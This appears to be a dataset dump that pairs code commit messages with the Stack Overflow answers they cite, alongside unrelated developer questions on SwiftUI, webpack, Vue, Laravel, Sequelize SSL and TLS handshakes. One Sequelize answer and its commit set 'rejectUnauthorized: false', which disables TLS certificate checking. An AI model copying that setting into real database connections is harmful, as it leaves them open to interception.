                    to: CGPoint(x: rect.minX + t, y: rect.minY + distance * Double(i+2) - Double(distBetweenLines[i]) ),
                    control: CGPoint(x: rect.width/2, y: distance * Double(i) )
                )
            }
            flag.toggle()
        }
        return path
    }
}
fileprivate struct SeededRandom: RandomNumberGenerator {
    init(seed: Int) { srand48(seed) }
    func next() -&amp;gt; UInt64 { return UInt64(drand48() * Double(UInt64.max)) }
}
enum ScribbleType {
    case vertical
    case horizontal
}
/////////////////////
/// Preview
////////////////////
struct FillScribbleRect_Previews: PreviewProvider {
    static var previews: some View {
        let size: CGFloat = 5
        return VStack (spacing: 30) {
            FillScribbleRect(brushSize: size, type: .horizontal)
                .frame(width: 50, height: 50)
            FillScribbleRect(brushSize: 6, type: .vertical)
            .frame(width: 200, height: 50)
            FillScribbleRect(brushSize: size, type: .horizontal)
                .frame(width: 50, height: 200)
        }
        .padding(150)
        .background(Color.white)
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C576</t>
  </si>
  <si>
    <t>Change import style to greatly reduce size (#18)
I'd been trying to reduce my Webpack bundle, but this otherwise awesome component was insisting on pulling in all of react-bootstrap.
With this change, only the needed react-bootstrap components will be loaded.
Please consider merging! :)
Reference:
https://stackoverflow.com/questions/34239731/how-to-minimize-the-size-of-webpacks-bundle#34241128</t>
  </si>
  <si>
    <t>According to your comments you are using
material-ui
and
react-bootstrap
. Those dependencies are bundled by webpack along with your
react
and
react-dom
packages. Any time you
require
or
import
a package it is bundled as part of your bundle file.
And here it comes my guess. You are probably importing the
react-bootstrap
and
material-ui
components using the
library
way:
import { Button } from 'react-bootstrap';
import { FlatButton } from 'material-ui';
This is nice and handy but it does not only bundles
Button
and
FlatButton
(and their dependencies) but the
whole
libraries.
One way to alleviate it is to try to only
import
or
require
what is needed, lets say the
component
way. Using the same example:
import Button from 'react-bootstrap/lib/Button';
import FlatButton from 'material-ui/lib/flat-button';
This will only bundle
Button
,
FlatButton
and their respective dependencies. But not the whole library. So I would try to get rid of all your
library
imports and use the
component
way instead.
If you are not using lot of components then it should reduce considerably the size of your bundled file.
As further explanation:
When you are using the
library
way you are importing
all these react-bootstrap
and
all these material-ui
components, regardless which ones you are actually using.</t>
  </si>
  <si>
    <t xml:space="preserve">Weird question, but I'm not sure if it's anti-pattern or not.
Say I have a web app that will be rendering 1000 records to an html table.  
The typical approach I've seen is to send a query down to the database,  translate the records in some way to some abstract state (be it an array, or a object, etc) and place the translated records into a collection that is then iterated over in the view.
As the number of records grows, this approach uses up more and more memory.
Why not send along with the query a callback that performs an operation on each of the translated rows as they are read from the database?  This would mean that you don't need to collect the data for further iteration in the view so the memory footprint shrinks, and you're not iterating over the data twice.
There must be something implicitly wrong with this approach, because I rarely see it used anywhere. What's wrong with this approach?
Thanks.
</t>
  </si>
  <si>
    <t>C577</t>
  </si>
  <si>
    <t>BIG REFACTOR: now using computed property proxy for the value prop -&gt;
 needed for v-model
this is necessary because otherwise I won't be able to change the v-model value passed in as
prop in child component -&gt; but changing of proxy prop is possible!
see https://stackoverflow.com/questions/48575226/modify-props-value-from-within-child-component</t>
  </si>
  <si>
    <t>You need to have a computed property proxy for a local value that handles the input/value values.
props: {
  value: {
    required: true,
  }
},
computed: {
  mySelection: {
    get() {
      return this.value;
    },
    set(v) {
      this.$emit('input', v)
    }
  }
}
Now you can set your template to use the
mySelection
value for managing your data inside this component and as it changes, the data is emitted correctly and is always in sync with the v-model (
selected
) when you use it in the parent.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to add a feature to my Laravel app that allows one user to follow another user. From the research that I've done I should be able to do this without a followings model. So what I do have is a follow_users pivot table with following schema&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Schema::create('follow_users', function (Blueprint $table) {
            $table-&amp;gt;id();
            $table-&amp;gt;foreignId('user_id')-&amp;gt;constrained()-&amp;gt;onUpdate('cascade')-&amp;gt;onDelete('cascade');
            $table-&amp;gt;foreignId('follow_id')-&amp;gt;constrained('users', 'id')-&amp;gt;onUpdate('cascade')-&amp;gt;onDelete('cascade');
            $table-&amp;gt;timestamps();
        });
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I understand I don't need the id or the timestamps but I would prefer to have them.&lt;/p&gt;
&lt;p&gt;My routes are as follows:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Route::middleware('auth:sanctum')-&amp;gt;prefix('v2')-&amp;gt;group(function () {
    Route::apiResource('/follows', FollowController::class);
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have many more routes than this but only showing this for brevity. All my other routes work as expected.&lt;/p&gt;
&lt;p&gt;For my Users model I have the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public function followings(): BelongsToMany
    {
        return $this-&amp;gt;belongsToMany(User::class, 'follow_users', 'follow_id', 'user_id')-&amp;gt;withTimestamps();
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I did create a FollowController in which I plan to hold my methods for index, store, show, update, delete. Where I'm getting lost is in the controller. For all of my other controllers I have something like&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public function store(StoreCommentRequest $request)
    {
        $suggestion = Comment::create($request-&amp;gt;validated());
        return CommentResource::make($suggestion);
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;to store my data. But because I don't have a Follow model nor a FollowResource I can't do it the same way.&lt;/p&gt;
&lt;p&gt;How do I code this using the User model to save the data to the pivot table?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C578</t>
  </si>
  <si>
    <t>Merge branch 'experiment-component' into video-21-better-redux-archit
ecting
- add "greet" endpoint for education purpose.
- add a GreetContainer along with the Greet Components to understand JS hoisting better.
- this experiment feeds to a stackoverflow forum question: http://stackoverflow.com/questions/38774280/reactjs-multiple-ways-to-add-modify-proptypes-of-a-stateless-functional-compon</t>
  </si>
  <si>
    <t>In javascript function declarations are
hoisted
to the top. So in actuality javascript treats this:
Greet2.propTypes = {...}
export default function Greet2 () {...}
like this:
function Greet2 () {...}
Greet2.propTypes = {...}
export default Greet2;</t>
  </si>
  <si>
    <t xml:space="preserve">As far as I can tell, all GUI toolkits are basically the same.
They all have some sort of base Widget that everything else that can be drawn inherits from.
They all have basically the same widgets - Window, Scrollbar, Button, Dialog, FileSelector, DrawingArea, Menu, Container, etc.
They all use event driven architecture with a "main loop" that responds to user events through application registered callbacks.
Most have some sort of "GUI-builder" program (ala Glade for GTK+).
As far as I can tell, most language bindings to each individual toolkit are more or less a literal translation of the API. This makes it seem to me like any programming language would be just about as productive as any other.
Some toolkits bill themselves as not just a GUI toolkit, but an "application framework", for example wxWidgets. They add on APIs for other stuff like networking, data structures, logging, threading, and database access. Considering that most of this other stuff usually has better libraries to access the functionality you need, it seems like it wouldn't be particularly important in deciding between toolkits. In fact, if you know you already have this stuff covered, it would be beneficial to choose a toolkit that is simple and know it is just a GUI toolkit, like GTK+ or FLTK.
Are there GUI libraries out there that are radically different from this mold?
As someone trying to break into GUI programming, how would you suggest to choose between a GUI toolkit - or does it really even matter which one? What programming language tends to be easiest for developing GUI applications - or should I just stick with what I know?
</t>
  </si>
  <si>
    <t>C579</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to validate a server for Let's Encrypt.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Route::get(&amp;quot;.well-known/acme-challenge/72kwJd49Bnm200zClrljFuKM4Kg4WGTxeYL_Q106Guk&amp;quot;, function() {
    return Response::make('72kwJd49Bnm200zClrljFuKM4Kg4WGTxeYL_Q106Guk.ICTKgcvAkw54XnumPCyKF7nRXh6h1G2VU-oGrYAAHho', 200)-&amp;gt;header('Content-Type', 'plain/txt');
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I tried adding this to 'routes/web.php'&lt;/p&gt;
&lt;p&gt;When I run&lt;/p&gt;
&lt;p&gt;&lt;code&gt;php artisan route:list&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;I do not see this path, and accessing the URL returns a 404.&lt;/p&gt;
&lt;p&gt;My other routes are working just fine. Is there a reason why returning a plain text response wouldn't work here?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C58</t>
  </si>
  <si>
    <t>Added Home controller and web.config
&lt;appSettings&gt;
    &lt;add key="webpages:Version" value="3.0.0.0"/&gt;
    &lt;add key="webpages:Enabled" value="false"/&gt;
    &lt;add key="ClientValidationEnabled" value="true"/&gt;
    &lt;add key="UnobtrusiveJavaScriptEnabled" value="true"/&gt;
    &lt;!--// If some error related to security
    //The SMTP server requires a secure connection or the client was not authenticated. The server response was: 5.5.1 Authentication Required.
    /*
    // Resolution: https://stackoverflow.com/questions/20906077/gmail-error-the-smtp-server-requires-a-secure-connection-or-the-client-was-not</t>
  </si>
  <si>
    <t>This generally happens when you try login from different time zone or IP Address Computer. Your production server and the mail id you have used both are in different time zone. Choose either of these two solutions:
1) Log in to production server via remote access, and sign in to gmail once with your credentials. They will ask for the confirmation, confirm it and log out.
Or 2) log in gmail to your local computer, Follow this
Link
and choose
review this activity
and take proper actions.</t>
  </si>
  <si>
    <t xml:space="preserve">We need to build an administration portal website to support our client/server application. Since we're a .Net shop the obvious traditional way would be to do that in ASP.Net. But Silverlight 2 will be coming out of beta a good while before our release date. Should we consider building the whole website in silverlight instead, with a supporting WCF backend?
The main function of the portal will be: users, groups and permissions configuration; user profile settings configuration; file upload and download for files needed to support the application.
I think the main reason for taking this approach would be that we have good experience with WPF and WCF, but little experience in ASP.Net. Either way we would have to learn ASP.Net or Silverlight, and learning Silverlight seems a more natural extension of our current skills.
Are there any big no-nos from the experience of StackOverflowers? What are the big positives?
</t>
  </si>
  <si>
    <t>C580</t>
  </si>
  <si>
    <t>Dont use async components for webpack conditional loading
This approach was deprecated in favor of import technique
https://stackoverflow.com/a/42388971</t>
  </si>
  <si>
    <t>I believe require.ensure is for webpack 'chunking' or 'code splitting.' Basically it's an asynchronous way of loading components so that only the necessary components are rendered for any given page. Instead of requiring components at the top, we require them conditionally or only at certain routes. Here we don't want to load './Admin until we're sure that user is an admin. See the docs for more information.
Is that an authorization check to make sure that the user has an admin role?
I don't think so; looks to me like that's being done with if (!isAdmin).
What is the .default property and what is the string 'admin' being used for?
The 'default' property indicates that the module was exported using ES6 export default syntax. There is more than one way to export a module - with module.exports = { ... }, or with export default class SomeClass { ... }. This is something of a rabbit hole into the differences between CommonJS and ES6 (as I understand it), but this SO answer might be of interest to you.
As for the 'admin' string, that's the 'chunk name.' Again from the docs:
By passing the same chunkName to various require.ensure() calls, we can combine their code into a single chunk, resulting in only one bundle that the browser must load.</t>
  </si>
  <si>
    <t xml:space="preserve">0  vote down
star
1
I want to be able to share my datacontracts (classes generated in the linq to entities designer are decorated with the [DataContract] attribute.
I'm trying to use the architecture as detailed here: [external-link] and trying to reference my interfaces in my silverlight project using the 'Add as link' method as detailed here: [external-link]
The problem I'm having is referencing my service interface in my silverlight project.
My solution has the following projects:
ORM - contains a Linq to Entities edmx model (namespace: company.client.Service) - the classes in this are decorated with DataContract attribute etc.
ServiceInterface - contains the interfaces (namespace company.client.Service) and a reference to the ORM for the classes (Customer etc) being returned
Service - contains the implementation of the service interfaces (namespace company.client.Service) and references ServiceInterface and the ORM for the classes.
ServiceHost - contains just .svc files as recommended in [external-link]
WebSLHost - the host for the silverlight app
Gui - the silverlight GUI.
I want all the of the projects to be standard .net assemblies except for the silverlight gui of course.
When I try to add a link to my service interface files (as shown in [external-link]) it give a compile error stating that it can't find the ORM and can't identify my entity types.
I want to be able to share the datacontract generated by the linq to entities generator with my service and the silverlight client, so if anyone has any ideas I'd appreciate them.
</t>
  </si>
  <si>
    <t>C581</t>
  </si>
  <si>
    <t>Fixed issue with Switch not toggling on tap on iOS. The problem was t
hat Switch wasn't a ReleasableComponent, so some pointerReleased events weren't being delivered. https://stackoverflow.com/questions/60715239/switch-component-does-not-change-the-state-when-you-click-on-it-in-ios</t>
  </si>
  <si>
    <t>This issue is now fixed in Git, with this commit:
https://github.com/codenameone/CodenameOne/commit/da6896e82899eda7e68166a83104a491e3b15c75
It will be available in this week's update on Friday.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;if I add a number of sources to a target, ie:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;   target_sources(  ${TARGET_NAME_ELF}   .. list of about 100 source files ... )
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How can I get the list of source files added to that ELF?&lt;/p&gt;
&lt;p&gt;I need to write that list to a file so that I can do other processing on the source files and that needs to be done external to CMAKE&lt;/p&gt;
&lt;p&gt;sort of like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;   file( WRITE  SOMEFILE.txt get_target_sources( ${TARGET_NAME_ELF} ) )
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C582</t>
  </si>
  <si>
    <t>Header Dialoge
Adding a Dialog for seeting campaign selection as well as user displayname
https://medium.com/@nacojohn/implement-angular-material-dialog-in-your-project-486c7c2f7f5d
https://stackoverflow.com/questions/46990389/angular-4-no-component-factory-found-did-you-add-it-to-ngmodule-entrycomponent</t>
  </si>
  <si>
    <t>Add this in your module.ts,
declarations: [
  AppComponent,
  ConfirmComponent
]
if ConfirmComponent is in another module, you need to export it there thus you can use it outside, add:
exports: [ ConfirmComponent ]
---Update Angular 9 or  Angular 8 with Ivy explicitly enabled---
Entry Components With Ivy are not required anymore and now are deprecated
---for Angular 9 and 8  with Ivy disabled---
In the case of a dynamically loaded component and in order for a ComponentFactory to be generated, the component must also be added to the module’s entryComponents:
declarations: [
  AppComponent,
  ConfirmComponent
],
entryComponents: [ConfirmComponent],
according to the definition of entryComponents
Specifies a list of components that should be compiled when this module is defined. For each component listed here, Angular will create a ComponentFactory and store it in the ComponentFactoryResolver.</t>
  </si>
  <si>
    <t xml:space="preserve">Are there any open source tools for building or designing houses? Does it have many features, like calculating costs or simulating extreme weather conditions/aging, etc?
I had the idea to start up a project like this, or join it; I think it would be really neat, but I couldn't find anything on it.
</t>
  </si>
  <si>
    <t>C583</t>
  </si>
  <si>
    <t>Load list information upon app starting
List information needs to load so information to load the related
tasks can be passed to the app.
For information on useEffect(), refer to:
https://stackoverflow.com/questions/53945763/componentdidmount-equivalent-on-a-react-function-hooks-component</t>
  </si>
  <si>
    <t>For the stable version of hooks (React Version 16.8.0+)
For componentDidMount
useEffect(() =&gt; {
  // Your code here
}, []);
For componentDidUpdate
useEffect(() =&gt; {
  // Your code here
}, [yourDependency]);
For componentWillUnmount
useEffect(() =&gt; {
  // componentWillUnmount
  return () =&gt; {
     // Your code here
  }
}, [yourDependency]);
So in this situation, you need to pass your dependency into this array. Let's assume you have a state like this
const [count, setCount] = useState(0);
And whenever count increases you want to re-render your function component. Then your useEffect should look like this
useEffect(() =&gt; {
  // &lt;div&gt;{count}&lt;/div&gt;
}, [count]);
This way whenever your count updates your component will re-render. Hopefully this will help a bit.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I can deploy my laravel application to digital ocean, and when I access it via the provided url, I see that my css and js styles (made in tailwind with vite server) do not run. I run &lt;code&gt;npm run dev&lt;/code&gt; and the styles are loaded, but soon the server crashes with the error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;node: internal/process/promises:391
    triggerUncaughtException(err, true /* fromPromise */);
    ^
Error: ELOOP: Too many symbolic links found, stat '/workspace/app/.heroku/php/php/php/php/php/php/php/php...
    in FSWatcher._handleError (file:///workspace/app/node_modules/vite/dist/node/chunks/dep-CfG9u7Cn.js:29529:10)
    in NodeFsHandler._addToNodeFs (file:///workspace/app/node_modules/vite/dist/node/chunks/dep-CfG9u7Cn.js:28344:18) {
  error: -40,
  code: 'ELOOP',
  system call: 'stat'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So, I try to run the &lt;code&gt;npm run build&lt;/code&gt; command and none of the styles will be loaded... how can I do this? I'm having a lot of difficulties and can't find a descending tutorial, and when reading docs about deploying Vite applications with Tailwind I couldn't understand exactly what to do in my context.&lt;/p&gt;
&lt;p&gt;I tried running the &lt;code&gt;npm install&lt;/code&gt; and &lt;code&gt;npm run build&lt;/code&gt; commands when compiling the server on digital ocean, and nothing happens, I also tried looking for the nginx server on the server to publicly address that the vite server should show the files from a certain folder, but I was unsuccessful.
I would be extremely grateful to anyone who can and is willing to help me, I'm a beginner developer but always looking to improve&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C584</t>
  </si>
  <si>
    <t xml:space="preserve">The platform isn't really as important as the theory.  For the record, it is ASP.NET (C# on 3.5 SP1), SQL Server 2005.  For the sake of argument, I have unlimited space (filesystem and database) and unlimited bandwidth.
I am working on a project that would allow multiple users to upload their own images which could be managed by that user and viewed by all users.  I am trying to determine what the best storage mechanism is.  My line of thought is that I would want to avoid storing them in the database directly, although I could see storing information about the images.
What I am seeing is that the user would upload the image.  The server would create a unique name for the image, store it to the filesystem, and store the relational data about that image in the database (i.e. when it was uploaded, the association to the user, reference to a caption, etc.).  Having these on disk is one step towards being able to move to a CDN in the future.
Has anyone used an approach like this or could recommend a different approach?  Should there be some sort of a folder structure, such as a folder for each user to help file access times?
Any feedback would be appreciated!
</t>
  </si>
  <si>
    <t>C585</t>
  </si>
  <si>
    <t>More SSL changes.
Based on this post https://stackoverflow.com/questions/27687546/cant-connect-to-heroku-postgresql-database-from-local-node-app-with-sequelize
ssl is a dictionary key that needs "require": true, and "rejectUnauthorized": false</t>
  </si>
  <si>
    <t>OK, found the answer by browsing sequelize source code : https://github.com/sequelize/sequelize/blob/master/lib/dialects/postgres/connection-manager.js#L39
To activate SSL for PG connections you don't need native: true or ssl: true but dialectOptions.ssl: true so the following did finally work:
sequelize = new Sequelize(process.env.DATABASE_URL, {
    dialect: 'postgres',
    protocol: 'postgres',
    dialectOptions: {
        ssl: true
    }
});
To work around the self signed certificate bug on node-postgres version 8 mentioned at https://stackoverflow.com/questions/58965011/sequelizeconnectionerror-self-signed-certificate you can use instead:
sequelize = new Sequelize(process.env.DATABASE_URL, {
    dialect: 'postgres',
    protocol: 'postgres',
    dialectOptions: {
        ssl: {
            require: true,
            rejectUnauthorized: false
        }
    }
});</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have two columns, &lt;strong&gt;date&lt;/strong&gt; and &lt;strong&gt;net sales&lt;/strong&gt;. My goal is to get the average sales for Monday&lt;/p&gt;
&lt;p&gt;I am trying the following formula:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;=AVERAGEIF(WEEKDAY(A2:A),2,B2:B)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Explanation of attempt:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;WEEKDAY(A2:A)&lt;/code&gt; is the range of dates calculated as week day numbers&lt;/li&gt;
&lt;li&gt;&lt;code&gt;2&lt;/code&gt; is the day number condition (Monday)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;B2:B&lt;/code&gt; is the range to sum&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I tried moving the &lt;code&gt;WEEKDAY&lt;/code&gt; function to the conditional, and it produced the same result:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;=AVERAGEIF(A2:A,WEEKDAY(A2:A)=2,B2:B)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Finally, I tried using &lt;code&gt;TEXT()&lt;/code&gt; instead of &lt;code&gt;WEEKDAY()&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;=AVERAGEIF(TEXT(A2:A,&amp;quot;dddd&amp;quot;),&amp;quot;Monday&amp;quot;,B2:B)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Nothing seems to work. All approaches result in a &lt;code&gt;#DIV/0&lt;/code&gt; divide by zero error :(&lt;/p&gt;
&lt;p&gt;Here is my sample data. Note the date column has actual &lt;code&gt;mm/dd/yyyy&lt;/code&gt; values but are displayed using &lt;code&gt;&amp;lt;Day of the week&amp;gt;, &amp;lt;Month&amp;gt; &amp;lt;Day of Month&amp;gt;&lt;/code&gt; formatting:&lt;/p&gt;
&lt;div class="s-table-container"&gt;&lt;table class="s-table"&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;date&lt;/th&gt;
&lt;th&gt;net sales&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Saturday, February 1&lt;/td&gt;
&lt;td&gt;$963.27&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Sunday, February 2&lt;/td&gt;
&lt;td&gt;$1,331.65&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Monday, February 3&lt;/td&gt;
&lt;td&gt;$1,014.70&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Tuesday, February 4&lt;/td&gt;
&lt;td&gt;$956.89&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Wednesday, February 5&lt;/td&gt;
&lt;td&gt;$625.13&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Thursday, February 6&lt;/td&gt;
&lt;td&gt;$734.03&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Friday, February 7&lt;/td&gt;
&lt;td&gt;$832.71&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Saturday, February 8&lt;/td&gt;
&lt;td&gt;$1,534.83&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Sunday, February 9&lt;/td&gt;
&lt;td&gt;$974.43&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Monday, February 10&lt;/td&gt;
&lt;td&gt;$904.45&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Tuesday, February 11&lt;/td&gt;
&lt;td&gt;$746.86&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Wednesday, February 12&lt;/td&gt;
&lt;td&gt;$596.86&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Thursday, February 13&lt;/td&gt;
&lt;td&gt;$671.32&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Friday, February 14&lt;/td&gt;
&lt;td&gt;$880.46&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Saturday, February 15&lt;/td&gt;
&lt;td&gt;$1,197.67&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Sunday, February 16&lt;/td&gt;
&lt;td&gt;$1,350.67&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Monday, February 17&lt;/td&gt;
&lt;td&gt;$0.00&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Tuesday, February 18&lt;/td&gt;
&lt;td&gt;$525.15&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Wednesday, February 19&lt;/td&gt;
&lt;td&gt;$477.58&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Thursday, February 20&lt;/td&gt;
&lt;td&gt;$0.00&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Friday, February 21&lt;/td&gt;
&lt;td&gt;$0.00&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Saturday, February 22&lt;/td&gt;
&lt;td&gt;$0.00&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Sunday, February 23&lt;/td&gt;
&lt;td&gt;$0.00&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Monday, February 24&lt;/td&gt;
&lt;td&gt;$0.00&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Tuesday, February 25&lt;/td&gt;
&lt;td&gt;$0.00&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Wednesday, February 26&lt;/td&gt;
&lt;td&gt;$0.00&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Thursday, February 27&lt;/td&gt;
&lt;td&gt;$0.00&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Friday, February 28&lt;/td&gt;
&lt;td&gt;$0.00&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
</t>
  </si>
  <si>
    <t>C586</t>
  </si>
  <si>
    <t>Add socket send/receive timeout options
On an unreliable connection (e.g., laptop put to sleep and changing wifi
networks) I've had mutt fairly regularly become stuck in SSL_read and
have to be killed.
Per some of the comments on
https://stackoverflow.com/questions/46517875/ssl-read-blocks-indefinitely
adding a timeout to the socket should carry over to the SSL_read call.
Using this socket_receive_timeout option appears to resolve the issue
for me.</t>
  </si>
  <si>
    <t>OpenSSL calls recv() which in turn obeys the SOCKET's timeout, which by default is infinite.  You can change the timeout thusly:
void socket_timeout_receive_set(SOCKET handle, dword milliseconds)
{
if(handle==SOCKET_HANDLE_NULL)
    return;
struct timeval tv = { long(milliseconds / 1000), (milliseconds % 1000) * 1000 };
setsockopt(handle, SOL_SOCKET, SO_RCVTIMEO, (char *)&amp;tv, sizeof(tv));
}
Unfortunately, ssl_error_get() returns SSL_ERROR_SYSCALL which it returns in other situations too, so it's not easy to determine that it timed out.  But this function will help you determine if the connection is lost:
bool socket_dropped(SOCKET handle)
{
// Special thanks:  "Detecting and terminating aborted TCP/IP connections" by Vinayak Gadkari
if(handle==SOCKET_HANDLE_NULL)
    return true;
// create a socket set containing just this socket
fd_set socket_set;
FD_ZERO(&amp;socket_set);
FD_SET(handle, &amp;socket_set);
// if the connection is unreadable, it is not dropped (strange but true)
static struct timeval timeout = { 0, 0 };
int count = select(0, &amp;socket_set, NULL, NULL, &amp;timeout);
if(count &lt;= 0) {
    // problem: count==0 on a connection that was cut off ungracefully, presumably by a busy router
    // for connections that are open for a long time but may not talk much, call keepalive_set()
    return false;
    }
if(!FD_ISSET(handle, &amp;socket_set))  // creates a dependency on __WSAFDIsSet()
    return false;
// peek at the next character
// recv() returns 0 if the connection was dropped
char dummy;
count = recv(handle, &amp;dummy, 1, MSG_PEEK);
if(count &gt; 0)
    return false;
if(count==0)
    return true;
return sec==WSAECONNRESET || sec==WSAECONNABORTED || sec==WSAENETRESET || sec==WSAEINVAL;
}</t>
  </si>
  <si>
    <t xml:space="preserve">I was wondering about how I should structured my projects.
We have some projects that are (re)use in other projects.
I mean, our data project and model project are use in one-to-many other projects.
What I really what to know is how to structure this type of project, what the best way to name it ?
In a standard 3-tier application, is should like something like :
DAL, DataAccessLayer, Data ...
Model, BusinessObject, BOL ...
UI, View, ...
Any other ideas ?
In each company I work, they got different way to organize it, is there one better than another ? Which one do you use and which one do you prefer and why ?
Thx!
</t>
  </si>
  <si>
    <t>C587</t>
  </si>
  <si>
    <t>Only yield client streams after successful SSL handshake
The deferred returned by client constructors (`aleph.tcp/client`,
`aleph.http.client/http-connection` and
`aleph.http.client/websocket-connection`) would always be resolved as
soon as the TCP connection was established, even when a `:ssl-context`
was given and the SSL handshake had not yet taken place. With this
patch, it will only be resolved once the SSL handshake was successful.
Unfortunately, since TLSv1.3 the connection may still fail with a
handshake error even after the handshake has seemingly succeeded. This
is because only an invalid certificate is explicitly rejected while a
valid certificate will be implicitly accepted. Thus, it's only
possible to determine whether the handshake has fully succeeded after
having succeessfully read some data. See [1] and [2] for more
details. However, this patch still seems worhtwhile even for TLSv1.3
since the stream is only yielded at the earliest time it would
theoretically be possible to successfully use it.
This patch is the client-side dual of
9c911e3. Thus, some common code has
been extracted to internal auxiliary functions in `aleph.netty`.
1: netty/netty#10502
2: https://stackoverflow.com/questions/62459802/tls-1-3-client-does-not-report-failed-handshake-when-client-certificate-verifica/62465859#62465859</t>
  </si>
  <si>
    <t>The server and client in both TLSv1.2 and TLSv1.3 consider the handshake to be complete when they have both written a "Finished" message, and received one from the peer. This is what the handshake looks like in TLSv1.2 (taken from RFC5246):
Client                                               Server
      ClientHello                  --------&gt;
                                                      ServerHello
                                                     Certificate*
                                               ServerKeyExchange*
                                              CertificateRequest*
                                   &lt;--------      ServerHelloDone
      Certificate*
      ClientKeyExchange
      CertificateVerify*
      [ChangeCipherSpec]
      Finished                     --------&gt;
                                               [ChangeCipherSpec]
                                   &lt;--------             Finished
      Application Data             &lt;-------&gt;     Application Data
So here  you can see that the client sends its Certificate and Finished messages in its second flight of communication with the server. It then waits to receive the ChangeCipherSpec and Finished messages back from the server before it considers the handshake "complete" and it can start sending application data.
This is the equivalent flow for TLSv1.3 taken from RFC8446:
Client                                           Server
Key  ^ ClientHello
Exch | + key_share*
     | + signature_algorithms*
     | + psk_key_exchange_modes*
     v + pre_shared_key*       --------&gt;
                                                  ServerHello  ^ Key
                                                 + key_share*  | Exch
                                            + pre_shared_key*  v
                                        {EncryptedExtensions}  ^  Server
                                        {CertificateRequest*}  v  Params
                                               {Certificate*}  ^
                                         {CertificateVerify*}  | Auth
                                                   {Finished}  v
                               &lt;--------  [Application Data*]
     ^ {Certificate*}
Auth | {CertificateVerify*}
     v {Finished}              --------&gt;
       [Application Data]      &lt;-------&gt;  [Application Data]
One of the advantages of TLSv1.3 is that it speeds up the time taken to complete a handshake. In TLSv1.3 the client receives the "Finished" message from the server
before
it sends its Certificate and Finished messages back. By the time the client sends its "Finished" message, it has already received  the "Finished" and so the handshake has completed and it can
immediately
start sending application data.
